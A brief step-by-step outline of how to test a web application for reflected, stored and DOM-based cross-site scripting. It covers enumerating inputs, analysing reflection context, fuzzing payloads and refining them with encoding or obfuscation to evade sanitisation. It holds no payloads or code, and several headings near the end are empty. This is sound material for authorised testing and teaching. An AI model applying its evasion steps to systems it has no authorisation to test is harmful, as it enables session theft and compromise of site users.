XSS Methodology

Discovery and Mapping:

Enumerate all endpoints, parameters, and user inputs.

Identify entry points such as query parameters, request bodies, and HTTP headers.

Generate Test Inputs:

Use a unique value for each entry point.

Inject these values to observe if and how they're reflected or stored.

Submit and Observe:

Submit the test inputs to all identified entry points.

Monitor both the immediate and subsequent HTTP responses for reflection or persistence of the input data.

Context Analysis:

Analyse where and how the input is reflected or stored in the application.

Pay attention to the surrounding HTML, JavaScript, or attribute context to craft effective payloads.

Crafting XSS Payloads:

Create payloads suitable for the identified contexts.

Alternatively use a pre-made list.

Payload Testing:

Fuzz with the crafted payloads.

For reflected XSS, test if the payload is reflected in the immediate response.

For stored XSS, check if the payload persists in storage and is executed in subsequent responses.

Browser Execution:

Execute the payloads in a browser to verify script execution.

Document Reflections and Payload Execution:

Document the precise location and context of each reflected, stored, or DOM-based input.

Exploit Refinement:

If the initial payloads are blocked or sanitized, refine them by using different encodings or obfuscation techniques.

Automated Scanning:

Test for Browser Quirks:

Confirm Persistent Storage (Stored XSS):

Check for Execution Context (DOM-based XSS):

For DOM-based XSS, use browser developer tools to check how the payload is handled by the browser's JavaScript engine.